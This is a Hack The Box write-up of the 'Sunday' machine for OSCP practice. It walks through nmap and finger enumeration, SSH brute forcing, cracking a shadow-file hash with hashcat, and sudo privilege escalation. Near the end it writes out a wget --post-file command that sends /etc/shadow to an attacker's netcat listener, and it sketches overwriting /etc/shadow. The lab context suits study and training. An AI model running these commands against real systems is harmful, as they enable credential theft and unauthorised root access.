Hack The Box — Sunday — without Metasploit (TJNull’s list for OSCP)

7 min readMay 13, 2023

This is my 10th write-up for Sunday, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

Enumeration and Scanning (Information Gathering).
Initial Foothold.
Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target.

nmap -sC -sV -O -A -T4 -Pn 10.129.184.59

-sC is used to run default scripts to enumerate the services further.
-sV is used for Version enumeration of the services
-O is used to for OS enumeration. (not usually needed if you use -A. But who cares)
-A is used for aggressive (not usually recommended in a real environment)
-T4 is used to set the number of parallel threads.
-Pn is used to force enumerate even if the machine is not responding to icmp (ping) packets.

But it seems like it’s taking too much time. I don’t know if the box is slow or my internet is the issue. There’s another smart way around. And that is to scan all open ports first without running any scripts for OS detection and Versions. After we have found all the open ports first, we can run full nmap scan with the scripts on those specified ports only.

To run nmap to identify only all open ports, we can simply:

nmap -p- 10.129.184.59 — max-retries=1

We got 5 ports open.

Let’s run a detailed scan only targeted to these ports.

sudo nmap -sC -sV -O -A -T4 -p79,111,515,22022 10.129.184.59

We have a finger port enabled on 79. Let’s enumerate it.

Finger is a very old service and can be used to enumerate valid usernames. You can found a perl script finger-user-enum here:

https://github.com/pentestmonkey/finger-user-enum

Let’s run this script against our target with the username lists in the seclists.

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.184.59 | less -S

-U is for the username wordlist.
-t is for target system/target host.
| less -S (it’s optional, I just used it to make the output more readable as this script prints very long lines. So i had to disable the line wrapping here)

Among all the other usernames, we can see 3 with last login dates.

root
sammy
sunny

With these usernames, let’s try to brute force the ssh. I think I should leave the root and make brute force attempt on the other two. Because, I don’t think that it would be get root access just with a brute force.

Let’s wait for any of them to crack.

I found valid password for sunny first.

Exploitation

Let’s ssh into the target with these credentials and see what we have, meanwhile hydra is doing its job on sammy.

And we are in!

First things, first. I am gonna check what commands can we run as sudo.

sudo -l

It seems like I can run /root/troll with root privileges using sudo.

Let’s try to run it and see what it does.

Seems like it does nothing, except for just printing “testing” and root user/group id.

Let’s dig into the history.

And I see that inside history there’s a reference to a shadow file backup in /backup directory.

Let’s visit that directory.

We have two files here, let’s read shadow.backup first.

And I got a user hash for sammy.

Privilege Escalation

Since Hydra is taking long, I can try cracking this hash using hashcat against rockyou, that would speed up the process since hashcat is really fast and we are not sending ssh requests to the server and waiting for its response.

I created a file named sammy.hash.

A quick search on hashcat example_hashes told me that module 7400 is what I need. Since it starts with $5$

https://hashcat.net/wiki/doku.php?id=example_hashes

Let’s crack the hash with hashcat

hashcat -m 7400 -a 0 sammy.hash /usr/share/wordlists/rockyou.txt -O

And it cracked Sammy’s password in no time, and hydra is still brute-forcing the credentials… See? Hashcat is a life saver!

Let’s switch user to sammy and see what we can do with that.

su sammy

And we are sammy!

First thing first again, let’s see what we can run as sudo.

sudo -l

It seems like we can run all commands with password, and wget without password.

Since, we have the password, let’s spawn a root shell directly.

sudo su root

After providing the valid sammy’s password we are root.

Okay, that was easy.

Now let’s try to root it with wget. (Assuming we don’t have the password for sammy).

For, this to be done; we know that wget can be run as root without any password. There’s an option in wget post-file that allows user to send file contents onto a destination.

Let’s use that and send the contents of /etc/shadow to our attacking machine.

First, we spawn a listener on our attacking machine on port 8000.

nc -lvnp 8000

And on our target we do:

sudo wget — post-file=/etc/shadow http://<attacking-machine-ip>:8000

Now if we look at our listener…

We have the shadow file along with root’s hash.

Now we can try cracking the root’s hash. But there’s a smarter way in this specific condition.

Since we can run wget as root through sammy, it means that we can also write files using wget as sudo.

How about we create our own shadow file exactly like this one, and replace the hash of root with the hash of sunny and then use wget with sudo on the target machine to write the /etc/shadow file?? In this way, I think we can login to root using the same password as sunny.

So let’s do that, because that would be faster than cracking the root’s hash, I guess. (unless root’s password is very weak).